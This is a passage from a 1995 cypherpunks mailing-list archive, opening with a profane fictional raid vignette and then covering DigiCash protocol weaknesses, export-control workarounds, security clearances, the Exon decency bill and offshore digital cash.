door about 4 AM, me groggily peeking out, a subpoena wadded into my shirt, then the bastards barged in. My ex-wife holding back, grinning like shit, saying you're fucked this time Johnny wee-dick. The black suits took all of it, computers, backup disks and tapes, printers, scanners, plotters, fuck, even the phones and message box -- jeez, why those? Harassment, teaching you a lesson, Bess my shark phoned just now, they shut your business down, take weeks to rummage the equipment and data, give it back slowly, one at a time, no hurry, wanting you to ache in case they find nothing. Swift justice, she hisses, even if you're innocent, cause nobody really is, they want you to scream, use you to broadcast a scare. Fuckups are getting gutted all over that Net Playboytoy. Six others this week, Bess coughs on, dragging deep, it's gonna rain even heavier in Exon's maelstrom, sweet darling maryjesus, prayers pay. From jya at pipeline.com Thu Dec 7 06:39:26 1995 From: jya at pipeline.com (John Young) Date: Thu, 7 Dec 95 06:39:26 PST Subject: Plea for information Message-ID: <199512071423.JAA14918@pipe4.nyc.pipeline.com> Daniel, During a year in this penitentiary, here's five I heard the older cons mutter: 1. "Applied Cryptography," Second edition just out, Bruce Schneier, Wiley, 1996. Flip through it and stare in disbelief and awe. Enjoy 2-5 and return, anxious. 2. "The Codebreakers," David Kahn, Macmillan, 1967. Crypto- biblical tales of lying and cheating via momentarily secret tricks. Continued in 3. 3. "Cyphernomicon," Tim May et al, 1006-Far Future. A wad of inspiring sci-non-fi of miscreating, eluding hard-bars and regaling in off-shore soft-bars. Also, C4. 4. "Cypherpunks archives," All Wholesomes, , Infinite. The stingers honey pot for luring beekeepers into berzerk swarms. Wear 5 for protection. 5. "PGP." Download it somewhere somewhat legally while you can, practice picking this sitar. And heave some brick- bucks at benefactor Phil for malefactor dues. From fletch at ain.bls.com Thu Dec 7 06:46:55 1995 From: fletch at ain.bls.com (Mike Fletcher) Date: Thu, 7 Dec 95 06:46:55 PST Subject: Responding to Exon -- technology is not enough In-Reply-To: Message-ID: <9512071447.AA04735@outland> A non-text attachment was scrubbed... Name: not available Type: application/pgp Size: 14 bytes Desc: not available URL: From frissell at panix.com Thu Dec 7 07:06:01 1995 From: frissell at panix.com (Duncan Frissell) Date: Thu, 7 Dec 95 07:06:01 PST Subject: 1)Age etc CA 2)Swedish Digicash Message-ID: <2.2b8.32.19951207150646.006874cc@panix.com> At 01:56 PM 12/7/95 +0100, Mats Bergstrom wrote: >Posten has licensed Digicash and plans to >open a mint/bank (Posten already is closely connected to a bank) >dealing in Swedish crowns. (This is not news but things seem to >be moving right now.) Some (but slight) mention of laundering, >of course. It's supposed to come about in 'the beginning of next >year'. I wonder how exchanges crowns/dollars will be managed. Is there an existing Post Office Bank in Sweden? If so, can foreigners open accounts? The UK's postal bank (Girobank) has become more like a normal bank and I think foreigners can open accounts. (The US Postal Savings System was closed in 1956 or so.) I'd rather have a Swedish Digicash account than one in the US. DCF "A bank is just a money switch. Soon we'll all have money switches." From jps at monad.semcor.com Thu Dec 7 07:16:05 1995 From: jps at monad.semcor.com (Jack P. Starrantino) Date: Thu, 7 Dec 95 07:16:05 PST Subject: latest librand source now av Message-ID: <9512071516.AA01104@monad.semcor.com> an116512 at anon.penet.fi writes > ... [various profanities omitted] ... The bad is getting worse. I don't know how these services work. Can I killfile the account, or do I need to ax the host? Many thanks. jps -- Jack P. Starrantino (215) 674-0200 (voice) SEMCOR, Inc. (215) 443-0474 (fax) 65 West Street Road jps at semcor.com Suite C-100 Warminster, PA 18974 From pfarrell at netcom.com Thu Dec 7 07:55:22 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Thu, 7 Dec 95 07:55:22 PST Subject: NIST GAK, Escrow Agent Criteria available Message-ID: <199512071554.HAA11631@netcom3.netcom.com> At the meeting, the NIST/NSA folks presented their criteria for being an acceptable escrow agent criteria. They had hardcopy, and Geoff had slides. The slides didn't exactly match the hardcopy. I have typed in the text from my hardcopy. It is on my clipper2 page (which is under construction at ) url for the criteria for escrow agent entities is I will _not_ post it (about 4 pages) to the list. If you can't use the web, email me and I'll forward a copy. I've got some notes on Geoff's presentation that I'll post later on. Pat Pat Farrell grad student http://www.isse.gmu.edu/students/pfarrell Infor. Systems and Software Engineering, George Mason University, Fairfax, VA PGP key available via finger or request #include standard.disclaimer From jamesd at echeque.com Thu Dec 7 08:00:59 1995 From: jamesd at echeque.com (James A. Donald) Date: Thu, 7 Dec 95 08:00:59 PST Subject: 1)Age etc CA 2)Swedish Digicash Message-ID: <199512071601.IAA23556@blob.best.net> At 10:06 AM 12/7/95 -0500, Duncan Frissell wrote: > Is there an existing Post Office Bank in Sweden? If so, can foreigners open > accounts? While any foreign account is of course better than any home country account, Sweden is not really a place that I would like to keep my money. High taxes, rigid controls, intrusive and unpredictable government, and, most importantly, the country has repeatedly teetered on the edge of bankruptcy. I would wait for some more solvent foreign country to get into digicash. More to the point -- few people will accept or spend digicash unless those unreasonable charges come right down. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From support at marktwain.com Thu Dec 7 08:09:15 1995 From: support at marktwain.com (Mark Twain Ecash Support) Date: Thu, 7 Dec 95 08:09:15 PST Subject: Still more on the Digicash protocol Message-ID: <199512071610.KAA16536@admin.starnet.net> At 06:01 PM 12/6/95 -0500, you wrote: >Hal has pointed out that payments & deposits with a wildcard in the >payment_hdr should NOT be sent in the clear, since they can be stolen >by any passive eavesdropper. Let us contemplate in which type of situation the payee will send such a wildcard coin. To pay a shop via TCP? No. The payment request comes in with the shop ID. The resulting payment won't be done with a wildcard coin. So when will the user pay with a wildcard coin? To make a payment to a party that is (pseudo-) anonymous to the payor. That is, if the payor sends the payment via anonymous remailer, in which case the messages should be encrypted anyway. [Why a remailed message should be encrypted is left as an exercise to the reader.] >Ian has pointed out the same problem with cancellations: the payer_code >should NOT be sent in the clear, since any passive eavesdropper can >grab this info and steal the corresponding payment. As mentioned before, this will be fixed. >Anyhow, the obvious solution is encryption. Our new observation is >that encrypting deposits & cancellations with the mint's public key >is not enough to solve the problem. [Argument in support of claim elided... I am not conviced.] >While I'm ranting, let me also remind you of a problem Ian discovered >earlier through reverse-engineering: the payment & deposit messages aren't >encrypted, [...] >With traffic analysis, if payers use the default TCP connection, all >this information about them can be compiled. If I target a payer, I'll >probably be able to record all his transactions (unless he's using >remailers or pipenet). If I sit outside a small business, I can compile >a dossier on its buying habits. One more time: this is only an issue if the payor is using a secure http connection. Otherwise, you can gather all that information with out without Ecash. The next release will use an already established SSL connection to transmit this information, should the payor request it. >Worse still, anonymity for the shop is worse with Digicash than with real >cash. If I pay you real cash on a secluded street, you're fairly anonymous. >If I pay you Digicash over the Internet, any passive eavesdropper could be >recording your identy and the whole transaction. Blech. This is raising an issue that has nothing to do with Ecash. The complaint is in fact about the lack of a gereral link encryption on the Internet. I agree that this is needed, but providing it really isn't Ecash's job. I am eagerly anticipating the general use of IPSEC. > (Yes, this means shops will need to have certificates if you want > to avoid a man-in-the-middle attack. So be it. Most online shops > will be using SSL, and thus have a certificate anyhow. You can safely > punt on the authentication between customer <-> shop if you're not > worried about active attacks.) That's why the next version will use existing SSL, should the user so desire. >* add a big warning to the documentation: users should not use wildcards > in payments (unless they know the dangers & are encrypting with e.g. PGP). Will do. >* continue specifying the protocol at a deeper level, like you promised > (and throw in source for security-critical modules too, eh? :-) Writing all this down takes time. DigiCash may hire a tech writer soon. That should improve communications between all parties. --Lucky Green --Mark Twain Bank Ecash Support Ecash. The secure Internet payment system that protects your privacy. From dreschs at mpd.tandem.com Thu Dec 7 08:23:10 1995 From: dreschs at mpd.tandem.com (Sten Drescher) Date: Thu, 7 Dec 95 08:23:10 PST Subject: Solution for US/Foreign Software? In-Reply-To: Message-ID: <5568fsj0wg.fsf@galil.austnsc.tandem.com> jimbell at pacifier.com (jim bell) said: jb> You miss the point! There will be no "international effort"! Here jb> are the steps: jb> 1. Write a program limited to keysize, carefully constructed to jb> isolate those portions of the program which define key size, jb> GAKedness, etc. jb> 2. Get it export approved. Export it. jb> THEN jb> 3. Announce that a "US-only" version of the same program is being jb> released, and include the minimal component which replaces the jb> limited software. Release it, only in the US of course! As has been pointed out, this would prolly doom geting export approval for version 2.0. However, let's keep the developer/publisher out of the loop. How about someone developing a 'binary diff', using the functionality of nm to find subroutine entry points, and then doing the binary diff from those starting points? Presumably, for most of the program the diff would mostly be changed entry points, with the bulk of diff being the crypto module. Then the bdiff gets exported, and bpatch-ed into the export binary. Of course, this wouldn't work if they strip the binary, but who is going to force them to do that? -- #include /* Sten Drescher */ To get my PGP public key, send me email with your public key and Subject: PGP key exchange Key fingerprint = 90 5F 1D FD A6 7C 84 5E A9 D3 90 16 B2 44 C4 F3 From ohuf at relay.sedat.de Thu Dec 7 08:30:16 1995 From: ohuf at relay.sedat.de (Oliver Huf) Date: Thu, 7 Dec 95 08:30:16 PST Subject: Solution for US/Foreign Software? In-Reply-To: <9512062236.AA01307@alpha> Message-ID: I don't know the US-Export regulations very well, so please allow a quick one: Maybe a legal way around the keysize-regulation would be: Many US companies have subsidiaries outside the US. Some of them are leaded by non-US-citizens. 1) The U.S.-company engineers a software with strong (but legal) crypto for use inside the U.S. The program is sold in the U.S. At the same time the company exports the sourcecode of the program *without* any crypto at all to their subsidiaries. (should be legal) 2) one or more of the subsidiaries include "self-engineered" crypto-routines into the program-"hull" they received from inside the U.S. This program is sold in th subsidiaries countries (Europe etc.) Two things have to be assured: - Both crypto-routines have to be compatible - No U.S.-citizens must be involved in the engineering of the subsidiaries crypto-routines. Any comments? ohuf. From jk at digit.ee Thu Dec 7 08:51:19 1995 From: jk at digit.ee (Jyri Kaljundi) Date: Thu, 7 Dec 95 08:51:19 PST Subject: 1)Age etc CA 2)Swedish Digicash In-Reply-To: <199512071601.IAA23556@blob.best.net> Message-ID: On Wed, 6 Dec 1995, James A. Donald wrote: > At 10:06 AM 12/7/95 -0500, Duncan Frissell wrote: > > Is there an existing Post Office Bank in Sweden? If so, can foreigners open > > accounts? > > I would wait for some more solvent foreign country to get into digicash. What about Estonia :) The taxes are low, there are a very few government regulations, the currency is very stable (based on German mark) ... One interesting law in Estonia is that the state budget must be balanced, so there is no way for the government to spend more money than it really has. Technological level here is also quite good, and Internet is more popular than in any other Eastern Europe or ex-USSR country. I think Estonia is an ideal place for such projects: high-tech companies testing their new technological ideas, inventions and business assumptions in real-life conditions. Just get yourself here ! Juri Kaljundi jk at digit.ee Digiturg http://www.digit.ee/ From dreschs at mpd.tandem.com Thu Dec 7 08:56:08 1995 From: dreschs at mpd.tandem.com (Sten Drescher) Date: Thu, 7 Dec 95 08:56:08 PST Subject: Secret Clearance (was: re: NIST GAK export meeting, sv) In-Reply-To: <199512062336.PAA14064@ix6.ix.netcom.com> Message-ID: <55zqd4hku3.fsf@galil.austnsc.tandem.com> Bill Stewart said: BS> Few, if any, other than companies already in the military business; BS> secret clearances are _expensive_, usually take a long time to get, BS> and the military only gives them to people who need them. Strange, the military processed a SECRET clearance on me even before I signed on the dotted line. Now a TS, that's expensive, but they didn't have much on me other than my SSAN and, I think, my prints to process the SECRET, so they couldn't have done much more than run be through the FBI criminal database. -- #include /* Sten Drescher */ To get my PGP public key, send me email with your public key and Subject: PGP key exchange Key fingerprint = 90 5F 1D FD A6 7C 84 5E A9 D3 90 16 B2 44 C4 F3 From Kevin.L.Prigge-2 at cis.umn.edu Thu Dec 7 09:05:37 1995 From: Kevin.L.Prigge-2 at cis.umn.edu (Kevin L Prigge) Date: Thu, 7 Dec 95 09:05:37 PST Subject: RSA '96 Conference Message-ID: <30c71f4f43fe002@noc.cis.umn.edu> This might be a little early, but will there be a cypherpunks get together at RSA '96? Perhaps a Coed Naked Cypherpunks Key Signing or something? -- Kevin L. Prigge |"A computer lets you make more mistakes faster UofM Central Computing | than any invention in human history--with the email: klp at umn.edu | possible exceptions of handguns and tequila." 01001001110101100110001| - Mitch Ratcliffe From hayden at krypton.mankato.msus.edu Thu Dec 7 09:53:12 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Thu, 7 Dec 95 09:53:12 PST Subject: News on Congressional Debate on Exon In-Reply-To: <01HYHWSWQVWG9S3RQJ@mbcl.rutgers.edu> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Wed, 6 Dec 1995, E. ALLEN SMITH wrote: > The agreement makes it all but certain that if legislation overhauling > the nation's telecommunications laws is enacted, it will contain some > of the most sweeping anti-smut provisions ever imposed on computer ^^^^ > communications. > > The plan is part of negotiations on a larger telecommunications bill > and settles differences among House members who were deeply divided > over how to best limit children's exposure to smut carried on computer ^^^^ > services, including the global network, Internet. (rest of biased language deleted to keep my lunch down. Suffice it to say that "smut" is such a loaded term than it's a wonder anyone can see anything withing the framework of the constitution.) > Indecent speech, unlike obscenity, is protected under the First > Amendment. Though the House plan doesn't yet specifically define > "indecent," the standard legal and regulatory definition says it is > material that describes in terms patently offensive, as measured by > contemporary community standard, sexual or excretory activities or > organ. That's obscenity folks. That _is_ legally defined. (Miller, wasn't it?) -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: PGP Signed with PineSign 2.2 iQCVAwUBMMcOhDokqlyVGmCFAQGRAAP+MUoTEogvkbpsjRhJKpfPkBgieXyY5atn piD13JM/2Ev3cW3tj+HrxSUayb1n3jfXuu5wyVAC8ZFtjEHSKENALGt1ND7D8vQu ZjdIohX+aK6BzT924GUlB0hGmoqPDUD7loz45/rYvtlJUt7HKnZHdniDgVsadvuG T2mtD05dg9c= =w5Q9 -----END PGP SIGNATURE----- ____ Robert A. Hayden <=> hayden at krypton.mankato.msus.edu \ /__ Finger for Geek Code Info <=> Finger for PGP Public Key \/ / -=-=-=-=-=- -=-=-=-=-=- \/ http://krypton.mankato.msus.edu/~hayden/Welcome.html -----BEGIN GEEK CODE BLOCK----- Version: 3.1 GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+ K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y+** ------END GEEK CODE BLOCK------ From ckleiman at fdic.gov Thu Dec 7 09:53:23 1995 From: ckleiman at fdic.gov (Christopher Kleiman) Date: Thu, 7 Dec 95 09:53:23 PST Subject: Secret Clearance (was: re: NIST GAK export meeting, sv) Message-ID: Bill Stewart said: >>BS> secret clearances are _expensive_, usually take a long time to get, >>BS> and the military only gives them to people who need them. > Strange, the military processed a SECRET clearance on me even >before I signed on the dotted line. Now a TS, that's expensive, but >they didn't have much on me other than my SSAN and, I think, my prints >to process the SECRET, so they couldn't have done much more than run be >through the FBI criminal database. >#include /* Sten Drescher Actually, you filled out some paperwork when you signed up that was sent forward; it wasn't much more than a check against all of the govts "evil type people" databases. However, I understand that it depends on what Level of background check as well. A limited background investigation involves filling out a long form saying that you've been a good boy/girl; it goes up from there. "Civilians" are different from military as well; after all, in one they own you, in the other, you can actually go home at night.;-) ** Nothing I say can be held as the viewpoint of my employer; I'm a short-timer any, so I really don't care what they think! Chris ** From hfinney at shell.portal.com Thu Dec 7 10:03:05 1995 From: hfinney at shell.portal.com (Hal) Date: Thu, 7 Dec 95 10:03:05 PST Subject: Still more on the Digicash protocol Message-ID: <199512071803.KAA18623@jobe.shell.portal.com> From: Mark Twain Ecash Support > Let us contemplate in which type of situation the payee will send such a > wildcard coin. To pay a shop via TCP? No. The payment request comes in with > the shop ID. The resulting payment won't be done with a wildcard coin. > > So when will the user pay with a wildcard coin? To make a payment to a party > that is (pseudo-) anonymous to the payor. That is, if the payor sends the > payment via anonymous remailer, in which case the messages should be > encrypted anyway. There might be some situations where it is useful to send a wildcard coin even via a TCP connection. For example, a pseudonymous server might pop up at some internet address different from its real one, make some transactions, and then go away. Or someone might set up an anonymous account at some public server (like c2.org) and conduct business anonymously on an ongoing basis. In either case the payee would be anonymous to the payor even though they communicated via TCP. The shop would have to send its payment request using "@" as the shop_accID field (I have heard of an undocumented "-X " switch in the Unix ecash program which allows the shop software to control this field in the payment request). We have also discussed the "pipe-net" which would allow anonymous TCP connections. This does not look like it can be as secure as the remailer net but for occasional or short-term use it can provide considerable privacy protection. I am glad that DigiCash supports this type of cash which anyone can deposit. Actually, I am surprised and puzzled that it does, given Chaum's apparent reluctance to endorse schemes to allow payee anonymity (due to political problems, apparently). It would be interesting to hear how DigiCash envisions this feature being used, and whether they plan to continue to allow it. Since it is not well documented (if at all) it's possible that they don't plan to keep it. But if they do, I think it would be good to adapt the protocols so this feature is usable over TCP connections. Hal From trei at process.com Thu Dec 7 10:06:33 1995 From: trei at process.com (Peter Trei) Date: Thu, 7 Dec 95 10:06:33 PST Subject: Secret Clearance (was: re: NIST GAK export meeting, sv) Message-ID: <9512071806.AA08617@toad.com> > Bill Stewart said: > BS> Few, if any, other than companies already in the military business; > BS> secret clearances are _expensive_, usually take a long time to get, > BS> and the military only gives them to people who need them. > Strange, the military processed a SECRET clearance on me even > before I signed on the dotted line. Now a TS, that's expensive, but > they didn't have much on me other than my SSAN and, I think, my prints > to process the SECRET, so they couldn't have done much more than run be > through the FBI criminal database. > It varies. My SECRET took almost a year and a personal interview before it was granted. Living 13 years abroad in 5 countries, visiting the eastern bloc, and having relatives over there, made DISA a bit nervous. Clearances tend to be easiest for nth generation midwesterners who are just out of school, have never been anywhere, and have no known relatives abroad. I never went for a TS - I figured it would be too much trouble, and might have been turned down. speaking only for myself... Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com From EALLENSMITH at mbcl.rutgers.edu Thu Dec 7 10:17:20 1995 From: EALLENSMITH at mbcl.rutgers.edu (E. ALLEN SMITH) Date: Thu, 7 Dec 95 10:17:20 PST Subject: Responding to Exon -- technology is not enough Message-ID: <01HYIYF5CAAK9S3S5K@mbcl.rutgers.edu> From: IN%"Bill.Humphries at msn.fullfeed.com" 6-DEC-1995 20:16:17.29 >Anyone wish to comment on the prospect of a double blind server, set >outside U.S. borders, that can act as an interface to the rest of the >world, perhaps encrypting or stego'ing the data transfered between it and >the user? Basically, an anonymous remailer that acts as a cross between >an NNTP, POP3, and SMTP servers. ------------------------------ Encrypting data between the server and the user would probably not work very well, due to the lack of cryptographic knowledge among most users (_I_ don't know how to set up PGP for a VAX (even if I had the room to store it in my quota), and I have some interests in this stuff). However, something where someone did a standard http link in, typed in a destination, and got put there in a way that would look like the person was coming in from the server should work. For best bookmarking results, the added link should probably be inside the link that it looked to the user like they were on. For instance, http://www.anonserve.net/http/www.hotsex.com/ should bookmark properly, and be interpretable by the server as being a command to do a http link to that that web location. I am admittedly not that familiar with the root mechanism of the WWW, but I believe this would work. -Allen From mark at unicorn.com Thu Dec 7 10:55:04 1995 From: mark at unicorn.com (Rev. Mark Grant) Date: Thu, 7 Dec 95 10:55:04 PST Subject: Still more on the Digicash protocol Message-ID: On Thu, 7 Dec 1995, Mark Twain Ecash Support wrote: > >Anyhow, the obvious solution is encryption. Our new observation is > >that encrypting deposits & cancellations with the mint's public key > >is not enough to solve the problem. > [Argument in support of claim elided... I am not conviced.] I think he means you shouldn't use a stream cipher like RC4 that XORs the plaintext with the generated keystream, since if you know part of the plaintext, you can XOR those bytes with (the id you want) XOR (the id being sent) and change the encrypted data so that the payment goes into your account and not theirs. This is a tough, but potentially feasible attack if you use that kind of encryption scheme. Is there anywhere that you could use a similar attack on SSL ? Mark From nobody at REPLAY.COM Thu Dec 7 11:24:01 1995 From: nobody at REPLAY.COM (Anonymous) Date: Thu, 7 Dec 95 11:24:01 PST Subject: FW: websurfer 4.6 Message-ID: <199512071919.UAA12598@utopia.hacktic.nl> On 7 Dec 95 at 18:06, Enzo Michelangeli wrote: > On Sat, 2 Dec 1995, Michael Froomkin wrote: > > > so much for compatibility....guess I'm sticking with netscape > > for now. > > These guys at Netmanage's support seem to confuse Trumpet's > version number with the Winsock version... Trumpet 2.0b (as, > AFAIK, any other Winsock package presently available) is > Winsock 1.1 compliant. Not surprising. They confuse random doodling with software, too. The real problem with NetManage is a severe case of brain death. The Sampler TCP/IP sucks, the paid-up TCP/IP is so-so, but of the clients, only ftp is fair, and the rest bite. All the NetManage clients I've tried crater, Mail can't rebuild its index structures if they are corrupted (uh, what was it that rebuild was supposed to do, Harvey?), the version of WebSurfer I evaluated took longer and longer to load and shut down, revealed on inspection to be due to loading/storing a very wordy global history in its, ahem, config file! Delete it and your config is gone. I wouldn't concern myself with what crypto is or isn't in a NetManage product -- they are not players as far as I'm concerned. They've been riding the wave of their TCP/IP not crashing as often as some others, but otherwise they're vacuum packed, untouched by coherent human thought. From EALLENSMITH at mbcl.rutgers.edu Thu Dec 7 11:28:38 1995 From: EALLENSMITH at mbcl.rutgers.edu (E. ALLEN SMITH) Date: Thu, 7 Dec 95 11:28:38 PST Subject: 1)Age etc CA 2)Swedish Digicash Message-ID: <01HYJ23QG1E29S3S5K@mbcl.rutgers.edu> From: IN%"jk at digit.ee" "Jyri Kaljundi" 7-DEC-1995 12:45:37.27 What about Estonia :) The taxes are low, there are a very few government regulations, the currency is very stable (based on German mark) ... One interesting law in Estonia is that the state budget must be balanced, so there is no way for the government to spend more money than it really has. Technological level here is also quite good, and Internet is more popular than in any other Eastern Europe or ex-USSR country. I think Estonia is an ideal place for such projects: high-tech companies testing their new technological ideas, inventions and business assumptions in real-life conditions. Just get yourself here ! -------- The various Eastern European countries have been targeted before as banking secrecy (read tax haven in the Feds' opinion) countries. Some others might include Malta, although the Catholic influence there may make pornography-related ventures problematic. On the other hand, using Malta would make the conspiracy theorists go nuts... -Allen From tallpaul at pipeline.com Thu Dec 7 11:32:44 1995 From: tallpaul at pipeline.com (tallpaul) Date: Thu, 7 Dec 95 11:32:44 PST Subject: Who Protects Us from the "Protectors?" Message-ID: <199512071933.OAA12319@pipe8.nyc.pipeline.com> Who Protects Us from the "Protectors?" The Case of Father Ritter from Covenant House (and the Relevance to the Crypto/G.A.K. Debate) The issue of the need to "protect children" is used as a major attack on quality crypto. The "kiddie pornographers" are described as one of the "four horsemen" who will, we are told, hide behind the crypto. Yet a review of the character and activities (medically, psychotherapeutically, ethically) of the very child protectors shows a tendency for some to be involved in the very activities they are ostensibly opposing. Worse, the public reputations built not infrequently serve to shield the individuals against public investigation of their own sexual activities. Father Bruce Ritter, one founder of Covenant House, is an example. Covenant House was originally started in New York City and located in the 42nd St. Times Square "porn district." The announced purpose of the organization was to protect runaway youth, arriving in NYC at the nearby interstate bus station, from sexual and other predations by the Square's denizens. Ritter soon developed a national reputation as a leading child protector. He was, for example, appointed a member of the President's Commission on Pornography ("Meese Commission.") There was only one fly in the ointment: Fr. Ritter was sexually involved with the very youth he was "protecting." So Ritter's anti-sexual persona (no sex education, "just say 'no'," anti-condom distribution, anti-birth control, anti- abortion, clerical celibacy, anti-porn) covered his sexual practices. Ritter's fundraising to protect the children raised money for his hotel rooms. Worse, his public persona served to protect him as charges of his sexual proclivities surfaced. Ritter's supporters in the "save the children" coalitions did not investigate Ritter. They attacked the youth bringing charges against their saint. Some critics were charged with being fronts for the Times Square porn industry. Others had their honesty and their sanity questioned. Only when additional charges from additional youth surfaced and journalists "followed the money" trail did the true story of Ritter's sexual proclivities and masquerade develop. Critics of quality crypto and the internet demand that supporters of these things answer questions about what the supporters are doing to fight the "kiddie porn" forces. We should ask them the same question(s) about their own movement. Equally we should demand answers to the question of what they are doing to expose forces -- like Ritter -- who use the "protect the children" industry as camouflage for the very predations the industry ostensibly exists to fight. From EALLENSMITH at mbcl.rutgers.edu Thu Dec 7 11:40:52 1995 From: EALLENSMITH at mbcl.rutgers.edu (E. ALLEN SMITH) Date: Thu, 7 Dec 95 11:40:52 PST Subject: Inherent Insecurity of Internet Commerce! (was RE: SecretClearance) Message-ID: <01HYJ2LA0XJS9S3S5K@mbcl.rutgers.edu> From: IN%"pete at loshin.com" "Pete Loshin" 7-DEC-1995 14:37:13.07 OK, I'll try again. First, as I recall, SECRET clearance is actually not very high: when I got it, I had to answer a bunch of questions (do you abuse illegal drugs? are you now or have you ever been a member of any organizations? have you ever been _arrested_ for anything?) ---------------------- I suspect I know what organizations they're interested in (CPUSA et al), but did they ask about any specific organizations? -Allen From liberty at gate.net Thu Dec 7 12:01:01 1995 From: liberty at gate.net (Jim Ray) Date: Thu, 7 Dec 95 12:01:01 PST Subject: Multiple questions Message-ID: <199512072002.PAA64046@tequesta.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Hello again cypherpunks: [In order to conserve bandwidth, I am going to ask for 5 things at once which have nothing to do with each-other in this post. Please reply to me privately if it's at all possible. ] 1. I have searched the archives for the author/artist of the "Rose on Random Bits" logo, and I have e-mailed many cypherpunks "old-timers" with no luck. [The logo appears at the top of the archives, but I am well aware that, as an anarchy, cypherpunks has no "official logo."] I have seen a number of beautiful logos during this search, but no- body has pointed me to the author of this particular logo. Any help finding this person would be _much_ appreciated. TIA. 2. I keep hearing every once-in-a-while about PGP3.0 (coming "real- soon-now") but there's nothing specific about what's delaying it. I would urge the developers (whoever they are) to release version 3.0 *before* the upcoming US presidential election, and I am interested in finding out more. TIA. 3. I have been asked by a Libertarian Party presidential candidate for a proposed platform plank in favor of strong, private, non-"GAK" encryption. [OK! I've stopped saying "FUCKED"!] Of course, I want the maximum cypherpunk input possible, so feel free to suggest. The wording must *not* be too technical in nature and should (of course) condemn ITAR. It should explain the real meaning of "escrow" and the "Newspeak" version in as few words as possible. TIA for any help on this. I'll post my final version if there's enough interest. 4. Has anyone in France been prosecuted for civilly-disobeying their anti-strong-crypto law by using PGP? What happened? Did the French people just roll over? TIA for any pointers (in English, please). 5. [A comment] Assuming the "secret clearance" requirement, how fast could an escrow agency be decertified if the "secret" person dies or is fired or heads for Anguilla, etc.? [Of course, I would not give a secret key to such a system, considering the effectiveness of simple attacks like "the honey trap" (ask Mordechai Vanunu how this attack works).] JMR - ---------------------------------------------------------------------- Regards, Jim Ray http://www.shopmiami.com/prs/jimray - ----------------------------------------------------------------------- PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 Key id. # E9BD6D35 (key on homepage & servers) PGP encrypted mail enjoyed, even if it's _not_ "important." IANAL - ----------------------------------------------------------------------- Help Phil! email zldf at clark.net or http://www.netresponse.com/zldf _______________________________________________________________________ -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Freedom isn't Freeh. iQCVAwUBMMdHO21lp8bpvW01AQEZDgP9Hw8Ymf2zHMY59+TUE6N8+v+WHSeAXsQk Kg7j3Z5jWwPSZopVL2joXolW2t41vDbFEgr5eclweGJXHkLiJdnlPEwGhr+rtf/n dqv/m/o99kBf92D7nCME3nzMxJ1c4eQcGwFBjBZRvysQZ6PU/s0sSo5xqd5g2Qku icleREE+aVc= =4NSh -----END PGP SIGNATURE----- From jimbell at pacifier.com Thu Dec 7 12:03:32 1995 From: jimbell at pacifier.com (jim bell) Date: Thu, 7 Dec 95 12:03:32 PST Subject: Solution for US/Foreign Software? Message-ID: At 10:26 AM 12/7/95 -0600, you wrote: >jimbell at pacifier.com (jim bell) said: > >jb> 1. Write a program limited to keysize, carefully constructed to >jb> isolate those portions of the program which define key size, >jb> GAKedness, etc. > >jb> 2. Get it export approved. Export it. > >jb> THEN > >jb> 3. Announce that a "US-only" version of the same program is being >jb> released, and include the minimal component which replaces the >jb> limited software. Release it, only in the US of course! > > As has been pointed out, this would prolly doom geting export >approval for version 2.0. However, let's keep the developer/publisher >out of the loop. How about someone developing a 'binary diff', using >the functionality of nm to find subroutine entry points, and then doing >the binary diff from those starting points? Presumably, for most of the >program the diff would mostly be changed entry points, with the bulk of >diff being the crypto module. Then the bdiff gets exported, and >bpatch-ed into the export binary. Of course, this wouldn't work if they >strip the binary, but who is going to force them to do that? Okay, that was basically what I was suggesting. A full binary difference file wouldn't even need to have any information about the internals of the program anyway. Basically, what needs to be achieved is a way to allow the software manufacturer to sell an approved product outside the country, but allow the foreign buyer to (easily) convert it into a GOOD encryption product. Once that works, laws against the export of encryption are meaningless. In fact, the legally-exported program obviously wouldn't even need to HAVE encryption in it at all, so it won't fall under ITAR classification, and thus won't need any kind of export license. From llurch at networking.stanford.edu Thu Dec 7 12:13:00 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Thu, 7 Dec 95 12:13:00 PST Subject: FW: websurfer 4.6 Message-ID: <199512072012.PAA21672@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- On Thu, 7 Dec 1995, Anonymous wrote: > Not surprising. They confuse random doodling with software, too. > > The real problem with NetManage is a severe case of brain death. My, thanks for your opinion. It may interest you to know that Microsoft recently licensed a bunch of stuff from NetManage (San Jose Merc, no real details given). - -rich - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMMdKlSoZzwIn1bdtAQGYYgF8CIf5Trt1E5YdMCna43irv5MeGgFnzSvP KXQ0ZR22U9MqbFAbrTjVKUB4ojC30lwo =+3ha -----END PGP SIGNATURE----- From futplex at pseudonym.com Thu Dec 7 12:34:49 1995 From: futplex at pseudonym.com (Futplex) Date: Thu, 7 Dec 95 12:34:49 PST Subject: Inherent Insecurity of Internet Commerce! (was RE: Secret Message-ID: <199512072035.PAA04297@opine.cs.umass.edu> various people wrote: > OK, I'll try again. First, as I recall, SECRET clearance > is actually not very high: when I got it, I had to answer > a bunch of questions (do you abuse illegal drugs? are > you now or have you ever been a member of any > organizations? have you ever been _arrested_ for anything?) [and] > I suspect I know what organizations they're interested in (CPUSA et > al), but did they ask about any specific organizations? I think this discussion of background checks for clearances has gone rather far astray of cypherpunks relevance, folks.... -Futplex From aleph1 at dfw.net Thu Dec 